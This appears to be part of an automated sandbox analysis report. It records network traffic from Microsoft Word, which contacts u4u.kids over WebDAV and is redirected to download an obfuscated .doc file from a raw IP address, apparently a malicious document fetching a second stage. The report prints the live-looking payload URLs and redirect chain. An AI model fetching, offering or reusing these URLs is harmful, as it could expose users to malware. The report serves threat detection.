                Oct 23, 2024 17:50:11.562103987 CEST | 49166 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:11.562130928 CEST | 443 | 49166 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:11.562180042 CEST | 49166 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:11.562797070 CEST | 49166 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:11.562810898 CEST | 443 | 49166 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:12.265603065 CEST | 443 | 49166 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:12.265675068 CEST | 49166 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:12.269191980 CEST | 49166 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:12.269202948 CEST | 443 | 49166 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:12.269697905 CEST | 443 | 49166 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:12.283802986 CEST | 49166 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:12.331336975 CEST | 443 | 49166 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:12.449623108 CEST | 443 | 49166 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:12.449681997 CEST | 443 | 49166 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:12.449734926 CEST | 49166 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:12.454351902 CEST | 49166 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:12.454364061 CEST | 443 | 49166 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:12.775859118 CEST | 49167 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:12.775877953 CEST | 443 | 49167 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:12.775938034 CEST | 49167 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:12.776210070 CEST | 49167 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:12.776221991 CEST | 443 | 49167 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:13.464757919 CEST | 443 | 49167 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:13.464829922 CEST | 49167 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:13.471421957 CEST | 49167 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:13.471441031 CEST | 443 | 49167 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:13.471801996 CEST | 443 | 49167 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:13.473294973 CEST | 49167 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:13.515328884 CEST | 443 | 49167 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:13.639054060 CEST | 443 | 49167 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:13.639144897 CEST | 443 | 49167 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:13.639194965 CEST | 49167 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:13.644835949 CEST | 49167 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:13.644844055 CEST | 443 | 49167 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:13.670185089 CEST | 49168 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:13.670211077 CEST | 443 | 49168 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:13.670264006 CEST | 49168 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:13.670972109 CEST | 49168 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:13.670979977 CEST | 443 | 49168 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:14.364119053 CEST | 443 | 49168 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:14.365235090 CEST | 49168 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:14.365247965 CEST | 443 | 49168 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:14.365897894 CEST | 49168 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:14.365904093 CEST | 443 | 49168 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:14.536170959 CEST | 443 | 49168 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:14.536245108 CEST | 443 | 49168 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:14.536504030 CEST | 49168 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:14.536504030 CEST | 49168 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:14.964428902 CEST | 49169 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:14.964454889 CEST | 443 | 49169 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:14.964539051 CEST | 49169 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:14.964875937 CEST | 49169 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:14.964885950 CEST | 443 | 49169 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:15.643336058 CEST | 443 | 49169 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:15.643450975 CEST | 49169 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:15.645893097 CEST | 49169 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:15.645906925 CEST | 443 | 49169 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:15.648185968 CEST | 49169 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:15.648199081 CEST | 443 | 49169 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:15.815602064 CEST | 443 | 49169 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:15.815670967 CEST | 443 | 49169 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:15.815773964 CEST | 49169 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:15.815803051 CEST | 49169 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:15.820498943 CEST | 49169 | 443 | 192.168.2.22 | 24.199.88.84
                Oct 23, 2024 17:50:15.820513964 CEST | 443 | 49169 | 24.199.88.84 | 192.168.2.22
                Oct 23, 2024 17:50:15.839723110 CEST | 49170 | 80 | 192.168.2.22 | 62.151.179.85
                Oct 23, 2024 17:50:15.845139027 CEST | 80 | 49170 | 62.151.179.85 | 192.168.2.22
                Oct 23, 2024 17:50:15.845217943 CEST | 49170 | 80 | 192.168.2.22 | 62.151.179.85
                Oct 23, 2024 17:50:15.845347881 CEST | 49170 | 80 | 192.168.2.22 | 62.151.179.85
                Oct 23, 2024 17:50:15.850738049 CEST | 80 | 49170 | 62.151.179.85 | 192.168.2.22
                Oct 23, 2024 17:50:24.328366995 CEST | 80 | 49170 | 62.151.179.85 | 192.168.2.22
                Oct 23, 2024 17:50:24.328528881 CEST | 49170 | 80 | 192.168.2.22 | 62.151.179.85
                Oct 23, 2024 17:50:24.328592062 CEST | 49170 | 80 | 192.168.2.22 | 62.151.179.85
                Oct 23, 2024 17:50:24.333865881 CEST | 80 | 49170 | 62.151.179.85 | 192.168.2.22
                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Oct 23, 2024 17:50:05.433645964 CEST | 54562 | 53 | 192.168.2.22 | 8.8.8.8
                Oct 23, 2024 17:50:05.445492983 CEST | 53 | 54562 | 8.8.8.8 | 192.168.2.22
                Oct 23, 2024 17:50:06.848154068 CEST | 52917 | 53 | 192.168.2.22 | 8.8.8.8
                Oct 23, 2024 17:50:06.855402946 CEST | 53 | 52917 | 8.8.8.8 | 192.168.2.22
                Oct 23, 2024 17:50:06.857325077 CEST | 62751 | 53 | 192.168.2.22 | 8.8.8.8
                Oct 23, 2024 17:50:06.877630949 CEST | 53 | 62751 | 8.8.8.8 | 192.168.2.22
                Oct 23, 2024 17:50:11.054267883 CEST | 57893 | 53 | 192.168.2.22 | 8.8.8.8
                Oct 23, 2024 17:50:11.534637928 CEST | 53 | 57893 | 8.8.8.8 | 192.168.2.22
                Oct 23, 2024 17:50:11.537827015 CEST | 54821 | 53 | 192.168.2.22 | 8.8.8.8
                Oct 23, 2024 17:50:11.561645031 CEST | 53 | 54821 | 8.8.8.8 | 192.168.2.22
                Oct 23, 2024 17:50:12.753123045 CEST | 54719 | 53 | 192.168.2.22 | 8.8.8.8
                Oct 23, 2024 17:50:12.761215925 CEST | 53 | 54719 | 8.8.8.8 | 192.168.2.22
                Oct 23, 2024 17:50:12.767570019 CEST | 49881 | 53 | 192.168.2.22 | 8.8.8.8
                Oct 23, 2024 17:50:12.775480986 CEST | 53 | 49881 | 8.8.8.8 | 192.168.2.22
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Oct 23, 2024 17:50:05.433645964 CEST | 192.168.2.22 | 8.8.8.8 | 0x75ed | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
                Oct 23, 2024 17:50:06.848154068 CEST | 192.168.2.22 | 8.8.8.8 | 0xc615 | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
                Oct 23, 2024 17:50:06.857325077 CEST | 192.168.2.22 | 8.8.8.8 | 0xcc3 | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
                Oct 23, 2024 17:50:11.054267883 CEST | 192.168.2.22 | 8.8.8.8 | 0xc083 | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
                Oct 23, 2024 17:50:11.537827015 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
                Oct 23, 2024 17:50:12.753123045 CEST | 192.168.2.22 | 8.8.8.8 | 0xb6ec | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
                Oct 23, 2024 17:50:12.767570019 CEST | 192.168.2.22 | 8.8.8.8 | 0xd97e | Standard query (0) | u4u.kids | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Oct 23, 2024 17:50:05.445492983 CEST | 8.8.8.8 | 192.168.2.22 | 0x75ed | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
                Oct 23, 2024 17:50:06.855402946 CEST | 8.8.8.8 | 192.168.2.22 | 0xc615 | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
                Oct 23, 2024 17:50:06.877630949 CEST | 8.8.8.8 | 192.168.2.22 | 0xcc3 | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
                Oct 23, 2024 17:50:11.534637928 CEST | 8.8.8.8 | 192.168.2.22 | 0xc083 | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
                Oct 23, 2024 17:50:11.561645031 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
                Oct 23, 2024 17:50:12.761215925 CEST | 8.8.8.8 | 192.168.2.22 | 0xb6ec | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
                Oct 23, 2024 17:50:12.775480986 CEST | 8.8.8.8 | 192.168.2.22 | 0xd97e | No error (0) | u4u.kids | | 24.199.88.84 | A (IP address) | IN (0x0001) | false
                • u4u.kids
                • 62.151.179.85
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.22 | 49170 | 62.151.179.85 | 80 | 3312 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Timestamp | Bytes transferred | Direction | Data
                Oct 23, 2024 17:50:15.845347881 CEST | 521 | OUT | GET /202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc HTTP/1.1
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                Host: 62.151.179.85
                Connection: Keep-Alive


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.22 | 49164 | 24.199.88.84 | 443 | 3312 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Timestamp | Bytes transferred | Direction | Data
                2024-10-23 15:50:06 UTC | 130 | OUT | OPTIONS / HTTP/1.1
                User-Agent: Microsoft Office Protocol Discovery
                Host: u4u.kids
                Content-Length: 0
                Connection: Keep-Alive
                2024-10-23 15:50:06 UTC | 439 | IN | HTTP/1.1 200 OK
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 23 Oct 2024 15:50:06 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 8
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Allow: GET,HEAD
                ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                2024-10-23 15:50:06 UTC | 8 | IN | Data Raw: 47 45 54 2c 48 45 41 44
                Data Ascii: GET,HEAD


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.22 | 49165 | 24.199.88.84 | 443 | 3312 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Timestamp | Bytes transferred | Direction | Data
                2024-10-23 15:50:07 UTC | 231 | OUT | HEAD /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft Office Existence Discovery
                Host: u4u.kids
                2024-10-23 15:50:07 UTC | 611 | IN | HTTP/1.1 302 Found
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 23 Oct 2024 15:50:07 GMT
                Content-Type: text/plain; charset=utf-8
                Content-Length: 220
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Location: http://62.151.179.85/202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc
                Vary: Accept


                Session ID | Source IP | Source Port | Destination IP | Destination Port
                2 | 192.168.2.22 | 49166 | 24.199.88.84 | 443
                Timestamp | Bytes transferred | Direction | Data
                2024-10-23 15:50:12 UTC | 125 | OUT | OPTIONS / HTTP/1.1
                Connection: Keep-Alive
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: u4u.kids
                2024-10-23 15:50:12 UTC | 439 | IN | HTTP/1.1 200 OK
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 23 Oct 2024 15:50:12 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 8
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Allow: GET,HEAD
                ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                2024-10-23 15:50:12 UTC | 8 | IN | Data Raw: 47 45 54 2c 48 45 41 44
                Data Ascii: GET,HEAD


                Session ID | Source IP | Source Port | Destination IP | Destination Port
                3 | 192.168.2.22 | 49167 | 24.199.88.84 | 443
                Timestamp | Bytes transferred | Direction | Data
                2024-10-23 15:50:13 UTC | 155 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 34 75 2e 6b 69 64 73 0d 0a 0d 0a
                Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: u4u.kids
                2024-10-23 15:50:13 UTC  435  IN  HTTP/1.1 404 Not Found
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 23 Oct 2024 15:50:13 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 144
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Content-Security-Policy: default-src 'none'
                2024-10-23 15:50:13 UTC  144  IN  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                Session ID  Source IP  Source Port  Destination IP  Destination Port
                4  192.168.2.22  49168  24.199.88.84  443
                Timestamp  Bytes transferred  Direction  Data
                2024-10-23 15:50:14 UTC  155  OUT  Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 75 34 75 2e 6b 69 64 73 0d 0a 0d 0a
                Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: u4u.kids
                2024-10-23 15:50:14 UTC  435  IN  HTTP/1.1 404 Not Found
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 23 Oct 2024 15:50:14 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 144
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Content-Security-Policy: default-src 'none'
                2024-10-23 15:50:14 UTC  144  IN  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                5  192.168.2.22  49169  24.199.88.84  443  3312  C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Timestamp  Bytes transferred  Direction  Data
                2024-10-23 15:50:15 UTC  461  OUT  GET /rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmament HTTP/1.1
                Accept: */*
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                Host: u4u.kids
                Connection: Keep-Alive
                2024-10-23 15:50:15 UTC  599  IN  HTTP/1.1 302 Found
                Server: nginx/1.18.0 (Ubuntu)
                Date: Wed, 23 Oct 2024 15:50:15 GMT
                Content-Type: text/plain; charset=utf-8
                Content-Length: 220
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 0
                Location: http://62.151.179.85/202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc
                Vary: Accept
                2024-10-23 15:50:15 UTC  220  IN  Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 36 32 2e 31 35 31 2e 31 37 39 2e 38 35 2f 32 30 32 2f 6d 65 6e 2f 6d 65 2f 77 65 67 76 65 6e 62 65 73 74 74 68 69 6e 67 73 77 69 74 68 67 6f 6f 64 74 68 69 6e 67 73 77 69 74 68 67 72 65 61 74 74 68 69 6e 67 73 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 76 65 72 79 67 6f 6f 64 70 65 72 73 6f 6e 77 69 74 68 67 72 65 61 74 63 6f 6f 6b 69 65 73 77 69 74 68 6e 69 63 65 77 6f 72 6b 69 6e 67 70 69 6c 6c 77 69 74 68 67 6e 69 63 65 5f 5f 5f 5f 5f 5f 5f 5f 5f 77 65 61 72 65 67 6f 6f 64 66 6f 72 6e 69 63 65 77 6f 72 6b 69 6e 67 74 68 69 6e 67 73 74 6f 62 65 69 6e 2e 64 6f 63
                Data Ascii: Found. Redirecting to http://62.151.179.85/202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.doc



                Target ID:0
                Start time:11:50:02
                Start date:23/10/2024
                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Imagebase:0x13f250000
                File size:1'423'704 bytes
                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                No disassembly